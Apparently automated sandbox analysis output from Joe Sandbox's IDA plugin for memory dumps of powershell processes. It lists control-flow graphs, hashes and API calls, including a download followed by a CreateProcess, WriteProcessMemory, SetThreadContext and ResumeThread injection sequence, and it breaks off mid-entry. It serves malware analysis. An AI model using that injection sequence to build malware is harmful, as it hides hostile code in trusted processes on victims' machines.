                                                                                                                                                                                                • API String ID: 0-2616320861
                                                                                                                                                                                                • Opcode ID: ca3a383b5c7f1c6ccb001bd1ea68b66bd17c05177708ed4f45c2f97b4608f275
                                                                                                                                                                                                • Instruction ID: 631ca7f7481610cc79fc57b5a11427ba7777423608692483c390b4809094e4cd
                                                                                                                                                                                                • Opcode Fuzzy Hash: ca3a383b5c7f1c6ccb001bd1ea68b66bd17c05177708ed4f45c2f97b4608f275
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7DD1043080E7C91FD35797385C146A67FA4EF47260B1911EBD48DCB0A3D619AD1AC3A2

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 195 7fe89977ae1-7fe89977aef 196 7fe89977af1 195->196 197 7fe89977af2-7fe89977b05 195->197 196->197 198 7fe89977b07 197->198 199 7fe89977b08-7fe89977b19 197->199 198->199 200 7fe89977b1b 199->200 201 7fe89977b1c-7fe89977ba1 199->201 200->201 205 7fe89977bab-7fe89977bb1 201->205 206 7fe89977ba3-7fe89977ba8 201->206 207 7fe89977bbb-7fe89977bfe URLDownloadToFileW 205->207 208 7fe89977bb3-7fe89977bb8 205->208 206->205 209 7fe89977c06-7fe89977c23 207->209 210 7fe89977c00 207->210 208->207 210->209
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.482794160.000007FE89970000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89970000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7fe89970000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: DownloadFile
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1407266417-0
                                                                                                                                                                                                • Opcode ID: 3f407bbb59246bc32d1f1ef0a3aaaeb0295a8d2f0448f289805b223546aa7390
                                                                                                                                                                                                • Instruction ID: fe85f881984b165952553dd8b781f74f6d7f13eb09d1fdbc92dec0a09c8aac7f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f407bbb59246bc32d1f1ef0a3aaaeb0295a8d2f0448f289805b223546aa7390
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E41F57180DB889FDB1ADF589C447AABBF0FB56321F04426FD08DD35A2CB646806C781

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 221 7fe89a40f0d-7fe89a40f96 223 7fe89a40f9c-7fe89a40fa6 221->223 224 7fe89a41098-7fe89a410dc 221->224 225 7fe89a40fbf-7fe89a40fee 223->225 226 7fe89a40fa8-7fe89a40fb5 223->226 231 7fe89a410de-7fe89a410eb 224->231 232 7fe89a410ed-7fe89a41124 224->232 225->224 237 7fe89a40ff4-7fe89a40ffe 225->237 226->225 228 7fe89a40fb7-7fe89a40fbd 226->228 228->225 231->232 235 7fe89a411c1-7fe89a411cb 232->235 236 7fe89a4112a-7fe89a4119e 232->236 238 7fe89a411cd-7fe89a411d7 235->238 239 7fe89a411d8-7fe89a411e8 235->239 255 7fe89a411a6-7fe89a411be 236->255 240 7fe89a41000-7fe89a4100d 237->240 241 7fe89a41017-7fe89a41077 237->241 242 7fe89a411f5-7fe89a4121a 239->242 243 7fe89a411ea-7fe89a411ee 239->243 240->241 245 7fe89a4100f-7fe89a41015 240->245 252 7fe89a4108b-7fe89a41097 241->252 253 7fe89a41079-7fe89a41084 241->253 243->242 245->241 253->252 255->235
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.482997965.000007FE89A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A40000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7fe89a40000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: xFl
                                                                                                                                                                                                • API String ID: 0-2227380614
                                                                                                                                                                                                • Opcode ID: bc7026d16227f2ddc8aeaa47abf85f9d3ff700c926315704b607c3d2542f171a
                                                                                                                                                                                                • Instruction ID: 30b97bef5ecc30d6230fbb543626f5ff25c38df4d41e7f124241113729ba6b3d
                                                                                                                                                                                                • Opcode Fuzzy Hash: bc7026d16227f2ddc8aeaa47abf85f9d3ff700c926315704b607c3d2542f171a
                                                                                                                                                                                                • Instruction Fuzzy Hash: C4A1E320A0DBCA0FE357973C59646647FE1EF67254B2901EBC48DCB1B3DA189C5AC362
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.482997965.000007FE89A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A40000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7fe89a40000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 0ct$h.r
                                                                                                                                                                                                • API String ID: 0-291253747
                                                                                                                                                                                                • Opcode ID: e85c995974148bb59d9dc403a0d3d04af2c5072fab8f8a1ac011a8f9935b1c62
                                                                                                                                                                                                • Instruction ID: 3f57af709b24de9c7711504b0373f1dc09e0d50260d498a9c8d57771d28336b9
                                                                                                                                                                                                • Opcode Fuzzy Hash: e85c995974148bb59d9dc403a0d3d04af2c5072fab8f8a1ac011a8f9935b1c62
                                                                                                                                                                                                • Instruction Fuzzy Hash: 00B1562080EBCA0FD747A73859242A67FF1EF57354F1A01EBD48DCB1A3D618991AC362

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 256 7fe89a43a81-7fe89a43a8d 257 7fe89a43a8f 256->257 258 7fe89a43a90-7fe89a43aa1 256->258 257->258 259 7fe89a43aa3 258->259 260 7fe89a43aa4-7fe89a43acc 258->260 259->260 261 7fe89a43ace-7fe89a43ad4 260->261 262 7fe89a43b06-7fe89a43b0e 260->262 263 7fe89a43b10-7fe89a43b2d 261->263 264 7fe89a43ad6-7fe89a43b01 261->264 262->263 265 7fe89a43b44 263->265 266 7fe89a43b2f-7fe89a43b42 263->266 264->262 267 7fe89a43b46-7fe89a43b48 265->267 266->267 268 7fe89a43b4e-7fe89a43b51 267->268 269 7fe89a43c28-7fe89a43c32 267->269 272 7fe89a43b53-7fe89a43b66 268->272 273 7fe89a43b68 268->273 270 7fe89a43c34-7fe89a43c3e 269->270 271 7fe89a43c3f-7fe89a43c4f 269->271 274 7fe89a43c51-7fe89a43c55 271->274 275 7fe89a43c5c-7fe89a43c80 271->275 276 7fe89a43b6a-7fe89a43b6c 272->276 273->276 274->275 276->269 277 7fe89a43b72-7fe89a43b7f 276->277 278 7fe89a43b93-7fe89a43ba3 277->278 279 7fe89a43b81-7fe89a43b8c 277->279 281 7fe89a43ba5-7fe89a43bb0 278->281 282 7fe89a43bb7-7fe89a43be5 278->282 279->278 281->282 284 7fe89a43c00-7fe89a43c10 282->284 285 7fe89a43be7-7fe89a43bfe 282->285 288 7fe89a43c17-7fe89a43c27 284->288 285->288
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.482997965.000007FE89A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A40000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7fe89a40000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: Xh9$h.r$h.r$h.r$h.r$h.r$h.r
                                                                                                                                                                                                • API String ID: 0-1034198341
                                                                                                                                                                                                • Opcode ID: 39e93f5610cb8cea71cf95359d93e4260508c8682a7fe20bef68b133d0c87182
                                                                                                                                                                                                • Instruction ID: 0783a121b45d008c8d0754c19ffcdb6867ee2a6e660f58a6aeff16685cf0948d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 39e93f5610cb8cea71cf95359d93e4260508c8682a7fe20bef68b133d0c87182
                                                                                                                                                                                                • Instruction Fuzzy Hash: 59610721A0D7CA4FE757932C59243B57FA1EF87344F2940E7D089CB1A3DA186C5AC7A2

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 530 7fe89a4380a-7fe89a4383a 531 7fe89a4383c-7fe89a4387a 530->531 532 7fe89a4387c-7fe89a43880 531->532 533 7fe89a43896-7fe89a438b0 531->533 532->531 534 7fe89a43882-7fe89a43895 532->534 535 7fe89a438b2-7fe89a438b8 533->535 536 7fe89a438e9-7fe89a438f0 533->536 534->533 537 7fe89a438f1-7fe89a4390f 535->537 538 7fe89a438ba-7fe89a438e8 535->538 536->537 539 7fe89a43911-7fe89a43924 537->539 540 7fe89a43926 537->540 538->536 541 7fe89a43928-7fe89a4392a 539->541 540->541 542 7fe89a43930-7fe89a43933 541->542 543 7fe89a439da-7fe89a439e4 541->543 542->543 546 7fe89a43939-7fe89a43941 542->546 544 7fe89a439f3-7fe89a43a03 543->544 545 7fe89a439e6-7fe89a439f2 543->545 547 7fe89a43a05-7fe89a43a09 544->547 548 7fe89a43a10-7fe89a43a36 544->548 549 7fe89a43943-7fe89a4394d 546->549 550 7fe89a43951 546->550 547->548 551 7fe89a4394f 549->551 552 7fe89a4396d-7fe89a439d9 549->552 553 7fe89a43956-7fe89a43963 550->553 551->553 553->552 555 7fe89a43965-7fe89a4396b 553->555 555->552
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.482997965.000007FE89A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A40000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7fe89a40000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 882$Xh9$`ko$h.r$h.r
                                                                                                                                                                                                • API String ID: 0-1131924455
                                                                                                                                                                                                • Opcode ID: 33eacb225eec1934acd61cbf44fb87c41f362d629b37102ea1cf3f99203a344a
                                                                                                                                                                                                • Instruction ID: 19ba99ef51b490838af5532bc45de46610a569a50fd3db1d884f6fee94c3b545
                                                                                                                                                                                                • Opcode Fuzzy Hash: 33eacb225eec1934acd61cbf44fb87c41f362d629b37102ea1cf3f99203a344a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A91EF2190E7D60FEB53937859256A57FF1DF57250B1E41EBC4C9CB1A3CA09AC0AC3A2

                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                Execution Coverage:4.5%
                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                Total number of Nodes:18
                                                                                                                                                                                                Total number of Limit Nodes:1
                                                                                                                                                                                                execution_graph 5848 7fe8997c3b6 5849 7fe8997c3bd 5848->5849 5852 7fe89976880 5849->5852 5851 7fe8997bcc4 5853 7fe8997e000 Wow64SetThreadContext 5852->5853 5855 7fe8997e093 5853->5855 5855->5851 5856 7fe8997c1fa 5860 7fe89976860 5856->5860 5858 7fe8997c252 5859 7fe8997c137 5859->5856 5859->5858 5861 7fe8997dcc0 CreateProcessW 5860->5861 5863 7fe8997deb3 5861->5863 5863->5859 5864 7fe8997e2c4 5866 7fe8997e2cd WriteProcessMemory 5864->5866 5867 7fe8997e3b1 5866->5867 5868 7fe8997e485 5869 7fe8997e4b0 ResumeThread 5868->5869 5871 7fe8997e52b 5869->5871
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.538212992.000007FE89A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A40000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89a40000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: /$0Tt$0Tt$0Tt$0Tt$0ct$0ct$0ct$0ct$8=t$8=t$8=t$8=t$Xh9
                                                                                                                                                                                                • API String ID: 0-1126072008
                                                                                                                                                                                                • Opcode ID: fdb148e25516612bac9fb0b6e500967412cf0f7b58c5736e3764010c330ccfa6
                                                                                                                                                                                                • Instruction ID: e0c6a4d9c56a6b98249caddfa3eda6735e2a1870b7952d6c720fbfaab4fcde73
                                                                                                                                                                                                • Opcode Fuzzy Hash: fdb148e25516612bac9fb0b6e500967412cf0f7b58c5736e3764010c330ccfa6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 68920320A1DBCA4FE75BA73C59242B97FE1EF56254F1900EBC48DC71A3DA18AC15C391

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 202 7fe89a404c2-7fe89a40508 205 7fe89a40512-7fe89a40522 202->205 206 7fe89a4050a-7fe89a40511 202->206 207 7fe89a40524-7fe89a40551 205->207 208 7fe89a4056c-7fe89a40571 205->208 206->205 209 7fe89a40793-7fe89a407ab 207->209 210 7fe89a40557-7fe89a40561 207->210 211 7fe89a40573-7fe89a40579 208->211 212 7fe89a4057b-7fe89a40580 208->212 222 7fe89a407f5-7fe89a40847 209->222 223 7fe89a407ad-7fe89a407f3 209->223 210->212 213 7fe89a40563-7fe89a4056b 210->213 211->212 214 7fe89a40722-7fe89a4072c 212->214 215 7fe89a40586-7fe89a40589 212->215 213->208 218 7fe89a4072e 214->218 219 7fe89a4073f-7fe89a4074f 214->219 220 7fe89a405a0 215->220 221 7fe89a4058b-7fe89a4059e 215->221 224 7fe89a4072f-7fe89a4073e 218->224 225 7fe89a40751-7fe89a40755 219->225 226 7fe89a4075c-7fe89a40792 219->226 227 7fe89a405a2-7fe89a405a4 220->227 221->227 243 7fe89a40852-7fe89a40904 222->243 244 7fe89a40849-7fe89a40851 222->244 223->222 225->226 227->214 228 7fe89a405aa-7fe89a405de 227->228 238 7fe89a405f5 228->238 239 7fe89a405e0-7fe89a405f3 228->239 240 7fe89a405f7-7fe89a405f9 238->240 239->240 240->214 242 7fe89a405ff-7fe89a40602 240->242 242->214 245 7fe89a40608-7fe89a4060b 242->245 246 7fe89a4090a-7fe89a40914 243->246 247 7fe89a40a3d-7fe89a40ae9 243->247 244->243 248 7fe89a40622 245->248 249 7fe89a4060d-7fe89a40620 245->249 250 7fe89a4092d-7fe89a40932 246->250 251 7fe89a40916-7fe89a40923 246->251 304 7fe89a40aeb 247->304 305 7fe89a40aec-7fe89a40afd 247->305 252 7fe89a40624-7fe89a40626 248->252 249->252 254 7fe89a409de-7fe89a409e8 250->254 255 7fe89a40938-7fe89a4093b 250->255 251->250 253 7fe89a40925-7fe89a4092b 251->253 252->214 257 7fe89a4062c-7fe89a4062f 252->257 253->250 260 7fe89a409ea-7fe89a409f6 254->260 261 7fe89a409f7-7fe89a40a07 254->261 258 7fe89a40952 255->258 259 7fe89a4093d-7fe89a40950 255->259 257->214 262 7fe89a40635-7fe89a4066f 257->262 264 7fe89a40954-7fe89a40956 258->264 259->264 266 7fe89a40a14-7fe89a40a3a 261->266 267 7fe89a40a09-7fe89a40a0d 261->267 276 7fe89a40671-7fe89a4067e 262->276 277 7fe89a40688-7fe89a40695 262->277 264->254 268 7fe89a4095c-7fe89a4095f 264->268 266->247 267->266 271 7fe89a40961-7fe89a40984 268->271 272 7fe89a40986 268->272 275 7fe89a40988-7fe89a4098a 271->275 272->275 275->254 278 7fe89a4098c-7fe89a40997 275->278 276->277 281 7fe89a40680-7fe89a40686 276->281 282 7fe89a40697-7fe89a406a2 277->282 283 7fe89a406a9-7fe89a406af 277->283 284 7fe89a4099e-7fe89a409a8 278->284 281->277 282->283 285 7fe89a40720-7fe89a40721 283->285 286 7fe89a406b1-7fe89a406b3 283->286 292 7fe89a409ae-7fe89a409b7 284->292 286->224 290 7fe89a406b5 286->290 293 7fe89a406fc 290->293 294 7fe89a406b7-7fe89a406ce 290->294 296 7fe89a409d0-7fe89a409dd 292->296 297 7fe89a409b9-7fe89a409c6 292->297 295 7fe89a406ff-7fe89a40707 293->295 294->295 298 7fe89a406d0-7fe89a406f8 294->298 299 7fe89a4070b-7fe89a40710 295->299 300 7fe89a40708-7fe89a40709 295->300 297->296 302 7fe89a409c8-7fe89a409ce 297->302 298->293 303 7fe89a40711-7fe89a4071f 299->303 300->303 302->296 303->285 304->305 307 7fe89a40aff 305->307 308 7fe89a40b00-7fe89a40b21 305->308 307->308
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.538212992.000007FE89A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A40000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89a40000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 0Tt$0ct$0ct$8=t
                                                                                                                                                                                                • API String ID: 0-1663470721
                                                                                                                                                                                                • Opcode ID: 6894c6050f1357c3adab772dacc5b8ab070d28af88bc5ba724be7a23b8f97bfd
                                                                                                                                                                                                • Instruction ID: 71ff4f6aef333ff7a5ba8402a676d3ddfd174ad13cf11baa7060a4c7f0c56f8d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6894c6050f1357c3adab772dacc5b8ab070d28af88bc5ba724be7a23b8f97bfd
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2702223090DBDA0FE71AA73858652B97FE1EF56294F1900EBD48EC71E3D618AC16C352

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 311 7fe89a40858-7fe89a40904 312 7fe89a4090a-7fe89a40914 311->312 313 7fe89a40a3d-7fe89a40ae9 311->313 314 7fe89a4092d-7fe89a40932 312->314 315 7fe89a40916-7fe89a40923 312->315 347 7fe89a40aeb 313->347 348 7fe89a40aec-7fe89a40afd 313->348 317 7fe89a409de-7fe89a409e8 314->317 318 7fe89a40938-7fe89a4093b 314->318 315->314 316 7fe89a40925-7fe89a4092b 315->316 316->314 322 7fe89a409ea-7fe89a409f6 317->322 323 7fe89a409f7-7fe89a40a07 317->323 320 7fe89a40952 318->320 321 7fe89a4093d-7fe89a40950 318->321 325 7fe89a40954-7fe89a40956 320->325 321->325 327 7fe89a40a14-7fe89a40a3a 323->327 328 7fe89a40a09-7fe89a40a0d 323->328 325->317 329 7fe89a4095c-7fe89a4095f 325->329 327->313 328->327 331 7fe89a40961-7fe89a40984 329->331 332 7fe89a40986 329->332 334 7fe89a40988-7fe89a4098a 331->334 332->334 334->317 335 7fe89a4098c-7fe89a409a8 334->335 342 7fe89a409ae-7fe89a409b7 335->342 343 7fe89a409d0-7fe89a409dd 342->343 344 7fe89a409b9-7fe89a409c6 342->344 344->343 346 7fe89a409c8-7fe89a409ce 344->346 346->343 347->348 349 7fe89a40aff 348->349 350 7fe89a40b00-7fe89a40b21 348->350 349->350
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.538212992.000007FE89A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A40000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89a40000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 0Tt$0ct$8=t
                                                                                                                                                                                                • API String ID: 0-377658526
                                                                                                                                                                                                • Opcode ID: d6ce12cfe2e07c08b077a2c79d7ade3ce3ca30ff8b840f511d6e5f2013fbe903
                                                                                                                                                                                                • Instruction ID: 3abe40165657c9a4431ab62c560a4e4cb24ea60d562aa3fb1232b9abf679becc
                                                                                                                                                                                                • Opcode Fuzzy Hash: d6ce12cfe2e07c08b077a2c79d7ade3ce3ca30ff8b840f511d6e5f2013fbe903
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4EA1242190EBDA0FE757A73848642B57FE1EF57254F1901EBD08ECB1A3DA18AC15C362

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 353 7fe89a43e99-7fe89a43eaf 354 7fe89a43eb1-7fe89a43ebf 353->354 355 7fe89a43ec9-7fe89a43ecf 353->355 354->355 356 7fe89a43ec1-7fe89a43ec7 354->356 357 7fe89a43ed5-7fe89a43ed8 355->357 358 7fe89a43fce-7fe89a43fd8 355->358 356->355 361 7fe89a43f21 357->361 362 7fe89a43eda-7fe89a43eed 357->362 359 7fe89a43feb-7fe89a43ffb 358->359 360 7fe89a43fda-7fe89a43fea 358->360 364 7fe89a43ffd-7fe89a44001 359->364 365 7fe89a44008-7fe89a44036 359->365 363 7fe89a43f23-7fe89a43f25 361->363 371 7fe89a43ef3-7fe89a43efd 362->371 372 7fe89a44039-7fe89a440e1 362->372 363->358 367 7fe89a43f2b-7fe89a43f2e 363->367 364->365 365->372 367->358 369 7fe89a43f34-7fe89a43f37 367->369 369->358 375 7fe89a43f3d-7fe89a43f7b 369->375 373 7fe89a43eff-7fe89a43f0c 371->373 374 7fe89a43f16-7fe89a43f1f 371->374 393 7fe89a440e3-7fe89a440e9 372->393 394 7fe89a440ed-7fe89a440f9 372->394 373->374 376 7fe89a43f0e-7fe89a43f14 373->376 374->363 375->358 383 7fe89a43f7d-7fe89a43f83 375->383 376->374 384 7fe89a43fa2-7fe89a43fb8 383->384 385 7fe89a43f85-7fe89a43f92 383->385 388 7fe89a43fbe-7fe89a43fcd 384->388 385->384 386 7fe89a43f94-7fe89a43fa0 385->386 386->384 393->394 395 7fe89a44105-7fe89a44117 394->395 396 7fe89a440fb-7fe89a44101 394->396 396->395
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.538212992.000007FE89A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A40000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89a40000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 0Tt$0ct$8=t
                                                                                                                                                                                                • API String ID: 0-377658526
                                                                                                                                                                                                • Opcode ID: 9d80d82cae40ec1b7687e1a1f93f3a9e2418f405f19cbeaa1a2ecd1558734efb
                                                                                                                                                                                                • Instruction ID: b9a67058b74268ef5406ea209a4e3a71b99965ced6e7edbf1ebdb51118fa7c88
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d80d82cae40ec1b7687e1a1f93f3a9e2418f405f19cbeaa1a2ecd1558734efb
                                                                                                                                                                                                • Instruction Fuzzy Hash: DA815320A0DBC94FE75AA72C69117B97BD1EF86354F1801FAD48ECB1A3DB14AC168391

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 397 7fe8997dbed-7fe8997dc70 398 7fe8997dc8f-7fe8997dd5d 397->398 399 7fe8997dc72-7fe8997dc81 397->399 404 7fe8997dd6f-7fe8997dd74 398->404 405 7fe8997dd5f-7fe8997dd6c 398->405 400 7fe8997dc8c-7fe8997dc8d 399->400 401 7fe8997dc83-7fe8997dc8b 399->401 400->398 401->400 406 7fe8997dd76-7fe8997dd86 404->406 407 7fe8997dd92-7fe8997ddbd 404->407 405->404 406->407 408 7fe8997dd88-7fe8997dd90 407->408 409 7fe8997ddbf-7fe8997ddd3 407->409 410 7fe8997ddd6-7fe8997deb1 CreateProcessW 408->410 409->410 412 7fe8997deb9-7fe8997df45 call 7fe8997df46 410->412 413 7fe8997deb3 410->413 413->412
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.537987105.000007FE89970000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89970000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89970000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 18ba2bcbf45f9c0c929a3e07197880a16be0df1923673c147552b150a04232e9
                                                                                                                                                                                                • Instruction ID: 7eb509151044757dc3022ef59886be979b9d37f41ecb4055ff68a0859cb58d77
                                                                                                                                                                                                • Opcode Fuzzy Hash: 18ba2bcbf45f9c0c929a3e07197880a16be0df1923673c147552b150a04232e9
                                                                                                                                                                                                • Instruction Fuzzy Hash: C0C1C47180CB988FDB56DF689851BD97BF0FF5A310F0542DBD049D72A2DA30A985CB82

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 420 7fe89976860-7fe8997dd5d 423 7fe8997dd6f-7fe8997dd74 420->423 424 7fe8997dd5f-7fe8997dd6c 420->424 425 7fe8997dd76-7fe8997dd86 423->425 426 7fe8997dd92-7fe8997ddbd 423->426 424->423 425->426 427 7fe8997dd88-7fe8997dd90 426->427 428 7fe8997ddbf-7fe8997ddd3 426->428 429 7fe8997ddd6-7fe8997deb1 CreateProcessW 427->429 428->429 431 7fe8997deb9-7fe8997df45 call 7fe8997df46 429->431 432 7fe8997deb3 429->432 432->431
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.537987105.000007FE89970000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89970000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89970000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                                                                • Opcode ID: cd2cc6b004185cfbe7d94f3eb929538674abdaa5f3386e15af6d31283897f57c
                                                                                                                                                                                                • Instruction ID: 0b647f91dfee0b93884adeac3bc29ef02f45f95314e4a52ff84cc5ba219e3106
                                                                                                                                                                                                • Opcode Fuzzy Hash: cd2cc6b004185cfbe7d94f3eb929538674abdaa5f3386e15af6d31283897f57c
                                                                                                                                                                                                • Instruction Fuzzy Hash: D3916B71D18A5C8FDB65DF58D845BEDBBF1FB58310F10429AD00EE3261DB30A9858B81

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 439 7fe8997e2c4-7fe8997e2cb 440 7fe8997e2d6-7fe8997e360 439->440 441 7fe8997e2cd-7fe8997e2d5 439->441 444 7fe8997e36a-7fe8997e3af WriteProcessMemory 440->444 445 7fe8997e362-7fe8997e367 440->445 441->440 446 7fe8997e3b7-7fe8997e3e1 444->446 447 7fe8997e3b1 444->447 445->444 447->446
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.537987105.000007FE89970000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89970000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89970000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                                • Opcode ID: 5dd1810c5d64753485508e2020a8997673d703c8b8aba1c8c47f4d2d8dcea797
                                                                                                                                                                                                • Instruction ID: 7fa05374753c256bf5eb93e40ab771d1bb0709b74390e347eae8a664afeaf10b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5dd1810c5d64753485508e2020a8997673d703c8b8aba1c8c47f4d2d8dcea797
                                                                                                                                                                                                • Instruction Fuzzy Hash: D031B63191CB588FDB18DF5C98467E97BE0FB55321F04426FE089D3252DA74A845CB91

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 448 7fe8997dfb5-7fe8997dfc1 449 7fe8997dfcc-7fe8997e055 448->449 450 7fe8997dfc3-7fe8997dfcb 448->450 453 7fe8997e057-7fe8997e05c 449->453 454 7fe8997e05f-7fe8997e091 Wow64SetThreadContext 449->454 450->449 453->454 455 7fe8997e099-7fe8997e0c0 454->455 456 7fe8997e093 454->456 456->455
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.537987105.000007FE89970000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89970000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
